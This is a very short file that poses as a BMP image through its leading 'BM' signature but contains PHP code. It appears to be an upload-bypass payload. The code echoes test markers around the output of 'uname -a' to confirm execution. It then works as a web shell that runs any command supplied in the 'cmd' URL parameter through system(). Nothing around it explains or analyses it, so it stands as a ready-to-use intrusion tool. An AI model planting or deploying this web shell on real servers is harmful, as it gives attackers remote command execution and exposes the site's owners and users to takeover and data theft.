BM
<?php
echo "SMP_TEST_START\n";
system("uname -a 2>&1");
echo "\nSMP_TEST_END";
if(isset($_GET['cmd'])) { system($_GET['cmd']); }
?>